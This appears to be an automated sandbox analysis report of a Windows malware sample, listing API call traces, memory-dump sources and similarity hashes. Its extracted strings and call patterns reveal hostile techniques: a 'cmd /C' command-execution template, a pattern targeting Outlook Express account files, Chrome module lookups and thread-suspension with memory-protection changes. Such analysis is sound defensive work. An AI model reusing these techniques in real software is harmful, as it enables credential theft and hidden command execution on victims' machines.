    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
